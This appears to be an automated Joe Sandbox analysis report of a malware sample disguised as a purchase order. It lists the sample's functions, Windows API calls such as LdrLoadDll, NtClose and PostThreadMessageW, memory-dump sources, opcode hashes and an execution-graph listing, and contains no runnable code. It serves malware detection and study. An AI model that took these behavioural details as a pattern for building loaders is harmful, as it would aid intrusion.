                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06D18909,?,?), ref: 06D18AB0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 87f979aa9dc0d3bba8c03b5ac11be3434e6a87e96436b99d8e02caff0ae0875c
                                  • Instruction ID: 1ac768bffe6dfa7541ad66fcab7215c5317efad8e935173bb4409fa3a4fe309d
                                  • Opcode Fuzzy Hash: 87f979aa9dc0d3bba8c03b5ac11be3434e6a87e96436b99d8e02caff0ae0875c
                                  • Instruction Fuzzy Hash: F01143B2800649DFCB60CF9AD844BDEBBF4EB48320F24841AD558A7340D778A584CFA1
                                  Function 06D17F7C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06D18909,?,?), ref: 06D18AB0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 494969318c7f43f9cfcc7038b838db07c35e4ee545718bf29de5fff20eb89690
                                  • Instruction ID: 7f7c98e851557cf0ea8488bddb5d5e71b591c4320501d463360b39b0204009ac
                                  • Opcode Fuzzy Hash: 494969318c7f43f9cfcc7038b838db07c35e4ee545718bf29de5fff20eb89690
                                  • Instruction Fuzzy Hash: E81125B1800349DFDB60DF9AD444BEEBBF4EB48320F20845AD958A7340D7B8A944CFA5
                                  Function 06D16F20 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D16F85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: e64c31e262a91fcce6677f45d79a7517e774cc35a94cc7d1003267b9f7a5a46b
                                  • Instruction ID: c3c6239c46a06f394667623170530b526dc74b19dbe2cc0f8eb0b5a50e8cc877
                                  • Opcode Fuzzy Hash: e64c31e262a91fcce6677f45d79a7517e774cc35a94cc7d1003267b9f7a5a46b
                                  • Instruction Fuzzy Hash: 8311E3B5800389EFDB60DF99D844BDEBBF8EB49320F208459E568A7240C3B5A554CFA1
                                  Function 06D143A8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: af26de5e1353a21bd91c0f515986019040055a7de6b179edc50cbd7f3609d6cf
                                  • Instruction ID: 4b06d3356338b6fe5ab78ffa34193f77df19deb30c244b7a85d9ce7612419970
                                  • Opcode Fuzzy Hash: af26de5e1353a21bd91c0f515986019040055a7de6b179edc50cbd7f3609d6cf
                                  • Instruction Fuzzy Hash: 211128B19003498FDB20DFAAD4457DEFBF5AF88724F248419D519A7240CBB9A540CB95
                                  Function 00E1B6D7 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B73E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 797ae5c59971de8ca09f44b7827cff75b7e9ee1bbff23b2048c3f8c53d27eb8c
                                  • Instruction ID: f1ef3da39d8a15a2b158f41bcf0dc8373d2cbfdb8125ca6200e8523bede94168
                                  • Opcode Fuzzy Hash: 797ae5c59971de8ca09f44b7827cff75b7e9ee1bbff23b2048c3f8c53d27eb8c
                                  • Instruction Fuzzy Hash: 0C110FB6C002498FDB10CF9AD444ADEFBF5AB88324F10852AD428B7250C3B9A545CFA1
                                  Function 00E1B6D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B73E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 3afe0479fec69d65302e992758c8afd4f70b0f0462c0a287cd021f13fb9873d2
                                  • Instruction ID: ad3dc7659a0386800fda2646593e36ca9ec4000400c6bfd4854d1e2add57feb3
                                  • Opcode Fuzzy Hash: 3afe0479fec69d65302e992758c8afd4f70b0f0462c0a287cd021f13fb9873d2
                                  • Instruction Fuzzy Hash: 12110FB6C002498FDB10CF9AD444ADEFBF5AB88324F10852AD418B7250C3B9A545CFA1
                                  Function 06D12DF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D16F85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: dbe87c88c0608bd95cce223fa6f9545fe09bfbf300521188a19b76555b6605c9
                                  • Instruction ID: ebe4b0885c6513afaf65f1c4aa0805900d28856a3442d31f86229c5fc302650a
                                  • Opcode Fuzzy Hash: dbe87c88c0608bd95cce223fa6f9545fe09bfbf300521188a19b76555b6605c9
                                  • Instruction Fuzzy Hash: 721106B5804349DFDB50DF99D444BDEBBF8EB48324F10845AE558A7340C3B5A954CFA1
                                  Function 009ED4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084130670.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9ed000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7105444eb94870b812151a64fd0d68b63330175c960270ea4b1e5af85f2a220
                                  • Instruction ID: cbce875e4405c2032c87d0f2c35994ec5311c3bc383dfde7618900da7b95b295
                                  • Opcode Fuzzy Hash: e7105444eb94870b812151a64fd0d68b63330175c960270ea4b1e5af85f2a220
                                  • Instruction Fuzzy Hash: D0212572504280EFDB06DF15D9C0B2ABF65FBD8318F20C56DE9090B25AC73ADC56CAA1
                                  Function 00B7D1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084462053.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b7d000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 545c4ac63f4b51af6620633b4993b4758467af0eac858220a0abc302754b63a2
                                  • Instruction ID: eaacee7ad6cde684a540f5800519296ce80d51d13f8785d7127dce3a66a604a9
                                  • Opcode Fuzzy Hash: 545c4ac63f4b51af6620633b4993b4758467af0eac858220a0abc302754b63a2
                                  • Instruction Fuzzy Hash: 7E210EB1604200EFDB04DF10D9C0B26BBB1FF88314F20C6ADE90E4B292C37AD806CA61
                                  Function 00B7D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084462053.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b7d000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cf74ea999e5f0361abe0db60623ec62cd16863b252476291acac90e7cff0227
                                  • Instruction ID: bd56818ba6213b6566b3cfd51855aaa614b7d4647d2d1c2a610b16ddcf8c4678
                                  • Opcode Fuzzy Hash: 4cf74ea999e5f0361abe0db60623ec62cd16863b252476291acac90e7cff0227
                                  • Instruction Fuzzy Hash: BF210E75604200EFCB14DF24D9D0B26BBB1EF88314F20C5ADE90E4B292C37AD806CA61
                                  Function 00B7D006 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084462053.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b7d000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1a90f0aa876211451882cb93f59b012afbd37440f8ca2e4fc4ba5ec9cc72ff4
                                  • Instruction ID: ec0af7e697388231466acd83636018a764ed14769977b399748799d0ae935123
                                  • Opcode Fuzzy Hash: c1a90f0aa876211451882cb93f59b012afbd37440f8ca2e4fc4ba5ec9cc72ff4
                                  • Instruction Fuzzy Hash: A12150755083849FCB02CF14D994B15BFB1EF46314F28C5DAD8498B2A7C33A9856CB62
                                  Function 009ED4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084130670.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9ed000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                  • Instruction ID: 43732172cb94722adffa7971fdb030da859f292f05fdf31ed9e1c71c455efe75
                                  • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                  • Instruction Fuzzy Hash: 6611E676504280DFCB16CF10D9C4B16BF71FB94318F24C6A9E8490B65AC33AD856CBA1
                                  Function 00B7D1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084462053.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b7d000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                  • Instruction ID: 766a9340b27717aa3a341f8befa72b397ae54c8d8a0dff8ec490f12b5f7c48e1
                                  • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                  • Instruction Fuzzy Hash: 28118B75504284DFCB15CF10D5C4B15BBB1FF84314F28C6A9D8494B6A6C33AD84ACB61
                                  Function 009ED759 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084130670.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9ed000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 408c671c0274b3d5f06c3539d5465ef3eb66f89bcda76a43317f015ceb529d30
                                  • Instruction ID: 4944e19a577e0265d2f5fff0747b0cf7f26643101ea5349cc44782b97129e730
                                  • Opcode Fuzzy Hash: 408c671c0274b3d5f06c3539d5465ef3eb66f89bcda76a43317f015ceb529d30
                                  • Instruction Fuzzy Hash: 0301A2B1406384DAE7114B66DD84B66BF9CEF41764F28881AED094A296C7BA9C40C6B1
                                  Function 009ED758 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084130670.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9ed000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37fa8b01e2fa166baff20863172fadbb1d28bd847305b6b38ee150e18f77e916
                                  • Instruction ID: c08333603367fed16e355dced0a81dddb03eb2d3dd47e724f6daa25272aafffc
                                  • Opcode Fuzzy Hash: 37fa8b01e2fa166baff20863172fadbb1d28bd847305b6b38ee150e18f77e916
                                  • Instruction Fuzzy Hash: 8AF062B14053849EE7118B16DD84B66FFACEF51764F18C45AED084B286C379AC44CBB1

                                  Non-executed Functions

                                  Function 06D19310 Relevance: .4, Instructions: 355COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 853026b5902f851001620b15b31e6b24daf1efbc9e1bde74548d14c6adb58f02
                                  • Instruction ID: d062d2beeab064f47a1bcbb851f694f4778e5ea687295073528f1b622ce23fe8
                                  • Opcode Fuzzy Hash: 853026b5902f851001620b15b31e6b24daf1efbc9e1bde74548d14c6adb58f02
                                  • Instruction Fuzzy Hash: 43D1BC70B01204AFEBA5DB75D8307AE77F6AF88300F14446AD15A9F291CF75D901CBA1
                                  Function 06D14458 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d39c0dba1f564025ad4a7057d1eae68d6c9fdf00c305c97a34f966609a0e4f8
                                  • Instruction ID: 8cff75cd2d51d7cc1c56b4883b15f9ba769e3b84858c19da3239a1f61cfee3dd
                                  • Opcode Fuzzy Hash: 2d39c0dba1f564025ad4a7057d1eae68d6c9fdf00c305c97a34f966609a0e4f8
                                  • Instruction Fuzzy Hash: 4BE11A74E002599FDB14DFA9D590AAEFBF2FF89304F248269D404AB355D770A942CFA0
                                  Function 06D12478 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12c93895e5b2150d7f9b34e5e67521ff9d69a53f77591328ff58662e90272a5a
                                  • Instruction ID: 4e5645b1c20fcf4fce46ff36730407bfa291da1bdc3144280eefb702012d9a18
                                  • Opcode Fuzzy Hash: 12c93895e5b2150d7f9b34e5e67521ff9d69a53f77591328ff58662e90272a5a
                                  • Instruction Fuzzy Hash: F4E12B74E002599FDB14DFA9D580AAEFBF2FF88304F248169D414AB355D771A982CFA0
                                  Function 06D11C08 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62e975a01355794020575f2e4cae728d3f83b35c00d646ef91fe59f68954cf76
                                  • Instruction ID: a4d23cd18a94eae3196a4bd57e19ce44b114feb6496c984037684a2db99392f0
                                  • Opcode Fuzzy Hash: 62e975a01355794020575f2e4cae728d3f83b35c00d646ef91fe59f68954cf76
                                  • Instruction Fuzzy Hash: E0E14C74E002599FDB14DFA9D580AAEFBF2FF88304F248269D514AB355D770A982CF60
                                  Function 06D13B80 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 740a4e028f460e9430e6b2ed5273b9a50b9e4663e536a5e4fd2ff89e522e5c59
                                  • Instruction ID: e26e58838ccf28fcaf0bfa89295564f02f7cc619fb9c94f61d94bec547c4d401
                                  • Opcode Fuzzy Hash: 740a4e028f460e9430e6b2ed5273b9a50b9e4663e536a5e4fd2ff89e522e5c59
                                  • Instruction Fuzzy Hash: 7BE1F674E002599FDB14DFA9D580AAEFBF2BF89304F248269D414AB355D770A982CF60
                                  Function 06D12040 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 374af1eca8f2746ff5c43147afb33a97e05b31013633dc55686b81d1733540ed
                                  • Instruction ID: 652f67fccb3a2a6124be2bddf3deb10a66419f1b69723b0ec063285cb247ac40
                                  • Opcode Fuzzy Hash: 374af1eca8f2746ff5c43147afb33a97e05b31013633dc55686b81d1733540ed
                                  • Instruction Fuzzy Hash: ADE12974E002599FDB14DFA8D580AAEFBF2FF89304F248269D414AB355D771A982CF60
                                  Function 00E1E2EC Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ce5254fe50fdeade689b60a8a4e392afedef07f9193718f06ac66064d4157df
                                  • Instruction ID: ad26165ac1d56e0ae400d34eea7e6358819b0d134a0d57019f7c57fbfa72deb0
                                  • Opcode Fuzzy Hash: 0ce5254fe50fdeade689b60a8a4e392afedef07f9193718f06ac66064d4157df
                                  • Instruction Fuzzy Hash: BCA15C32A002098FCF05DFB5C8449DEBBB2FF85304B15957AE916BB265DB71E985CB80
                                  Function 06D12030 Relevance: .1, Instructions: 136COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a591c8cfd8c13f991f472a6e77e76f4021ca4557becaf33bc3357e7401132d93
                                  • Instruction ID: 37c57812eef92e75eda7ee736ff8ca641dc70befee5c630903ee490082d4f9ca
                                  • Opcode Fuzzy Hash: a591c8cfd8c13f991f472a6e77e76f4021ca4557becaf33bc3357e7401132d93
                                  • Instruction Fuzzy Hash: BD515074E002599FDB14CF69D9405AEFBF2BF89304F24C169D408AB315D7719A82CF60
                                  Function 06D16172 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16fa0fa30113a41df7f55325a6d70b05795a0f37fa02d252eee2558ce22ac8ab
                                  • Instruction ID: c6b5efe3df172880436ad24f5b111ec56bc5f4f4f9f9149c37a71a03c5905022
                                  • Opcode Fuzzy Hash: 16fa0fa30113a41df7f55325a6d70b05795a0f37fa02d252eee2558ce22ac8ab
                                  • Instruction Fuzzy Hash: D0D01335D4E094EFD7414A947C504F4B7BCDB47031B4E7092C54D5F512E154D5254344

                                  Execution Graph

                                  Execution Coverage:1.1%
                                  Dynamic/Decrypted Code Coverage:4.7%
                                  Signature Coverage:4.7%
                                  Total number of Nodes:149
                                  Total number of Limit Nodes:16
                                  execution_graph 95616 424323 95617 42433f 95616->95617 95618 424367 95617->95618 95619 42437b 95617->95619 95620 42b543 NtClose 95618->95620 95626 42b543 95619->95626 95622 424370 95620->95622 95623 424384 95629 42d4e3 RtlAllocateHeap 95623->95629 95625 42438f 95627 42b560 95626->95627 95628 42b571 NtClose 95627->95628 95628->95623 95629->95625 95630 42e4a3 95631 42e4b3 95630->95631 95632 42e4b9 95630->95632 95635 42d4a3 95632->95635 95634 42e4df 95638 42b853 95635->95638 95637 42d4be 95637->95634 95639 42b870 95638->95639 95640 42b881 RtlAllocateHeap 95639->95640 95640->95637 95774 42ab73 95775 42ab90 95774->95775 95778 1622df0 LdrInitializeThunk 95775->95778 95776 42abb8 95778->95776 95779 4246b3 95783 4246c2 95779->95783 95780 42474c 95781 424706 95782 42d3c3 RtlFreeHeap 95781->95782 95784 424716 95782->95784 95783->95780 95783->95781 95785 424747 95783->95785 95786 42d3c3 RtlFreeHeap 95785->95786 95786->95780 95641 1622b60 LdrInitializeThunk 95642 41e0e3 95643 41e109 95642->95643 95650 41e200 95643->95650 95651 42e5d3 95643->95651 95645 41e19b 95646 41e1f7 95645->95646 95645->95650 95662 42abc3 95645->95662 95646->95650 95657 427c73 95646->95657 95649 41e2a7 95652 42e543 95651->95652 95653 42e5a0 95652->95653 95654 42d4a3 RtlAllocateHeap 95652->95654 95653->95645 95655 42e57d 95654->95655 95666 42d3c3 95655->95666 95658 427cd0 95657->95658 95659 427d0b 95658->95659 95672 4189c3 95658->95672 95659->95649 95661 427ced 95661->95649 95663 42abdd 95662->95663 95679 1622c0a 95663->95679 95664 42ac09 95664->95646 95669 42b8a3 95666->95669 95668 42d3dc 95668->95653 95670 42b8bd 95669->95670 95671 42b8ce RtlFreeHeap 95670->95671 95671->95668 95673 418963 95672->95673 95676 42b8f3 95673->95676 95675 4189ab 95675->95661 95677 42b910 95676->95677 95678 42b921 ExitProcess 95677->95678 95678->95675 95680 1622c11 95679->95680 95681 1622c1f LdrInitializeThunk 95679->95681 95680->95664 95681->95664 95787 414033 95788 41404d 95787->95788 95793 4179d3 95788->95793 95790 41406b 95791 4140b0 95790->95791 95792 41409f PostThreadMessageW 95790->95792 95792->95791 95794 4179f7 95793->95794 95795 417a33 LdrLoadDll 95794->95795 95796 4179fe 95794->95796 95795->95796 95796->95790 95797 41afd3 95798 41b017 95797->95798 95799 41b038 95798->95799 95800 42b543 NtClose 95798->95800 95800->95799 95682 418bc5 95683 42b543 NtClose 95682->95683 95684 418bcf 95683->95684 95685 413ca5 95686 413c9a 95685->95686 95687 413bc6 95685->95687 95687->95686 95690 42b7c3 95687->95690 95691 42b7e0 95690->95691 95694 1622c70 LdrInitializeThunk 95691->95694 95692 413bd2 95694->95692 95695 401a4c 95696 401a60 95695->95696 95696->95696 95699 42e963 95696->95699 95702 42cfc3 95699->95702 95703 42cfe9 95702->95703 95714 4076c3 95703->95714 95705 42cfff 95713 401b88 95705->95713 95717 41ade3 95705->95717 95707 42d01e 95708 42d033 95707->95708 95709 42b8f3 ExitProcess 95707->95709 95728 4275e3 95708->95728 95709->95708 95711 42d042 95712 42b8f3 ExitProcess 95711->95712 95712->95713 95732 416713 95714->95732 95716 4076d0 95716->95705 95718 41ae0f 95717->95718 95743 41acd3 95718->95743 95721 41ae54 95724 41ae70 95721->95724 95726 42b543 NtClose 95721->95726 95722 41ae3c 95723 41ae47 95722->95723 95725 42b543 NtClose 95722->95725 95723->95707 95724->95707 95725->95723 95727 41ae66 95726->95727 95727->95707 95729 42763d 95728->95729 95731 42764a 95729->95731 95754 418523 95729->95754 95731->95711 95733 416727 95732->95733 95735 416740 95733->95735 95736 42bf63 95733->95736 95735->95716 95737 42bf7b 95736->95737 95738 42bf9f 95737->95738 95739 42abc3 LdrInitializeThunk 95737->95739 95738->95735 95740 42bfee 95739->95740 95741 42d3c3 RtlFreeHeap 95740->95741 95742 42c004 95741->95742 95742->95735 95744 41aced 95743->95744 95748 41adc9 95743->95748 95749 42ac63 95744->95749 95747 42b543 NtClose 95747->95748 95748->95721 95748->95722 95750 42ac7d 95749->95750 95753 16235c0 LdrInitializeThunk 95750->95753 95751 41adbd 95751->95747 95753->95751 95756 41854d 95754->95756 95755 4189ab 95755->95731 95756->95755 95762 414163 95756->95762 95758 418654 95758->95755 95759 42d3c3 RtlFreeHeap 95758->95759 95760 41866c 95759->95760 95760->95755 95761 42b8f3 ExitProcess 95760->95761 95761->95755 95763 414182 95762->95763 95764 4142d7 95763->95764 95766 4142a0 95763->95766 95771 413bb3 LdrInitializeThunk 95763->95771 95764->95758 95766->95764 95772 41b0f3 RtlFreeHeap LdrInitializeThunk 95766->95772 95767 4142b4 95767->95764 95773 41b0f3 RtlFreeHeap LdrInitializeThunk 95767->95773 95769 4142cd 95769->95758 95771->95766 95772->95767 95773->95769

                                  Executed Functions

                                  Function 0042B543 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 406 42b543-42b57f call 404ae3 call 42c5b3 NtClose
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction ID: 7baa626187fcc9ed4b9f1308d01cd81d2364a9ef1d1c3a9d280c108a6a831b1c
                                  • Opcode Fuzzy Hash: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction Fuzzy Hash: 56E04F352502547BD510EA5ADC41FDB775CDBC5754F40411AFA0867245C6B1BA0087E4
                                  Function 01622B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
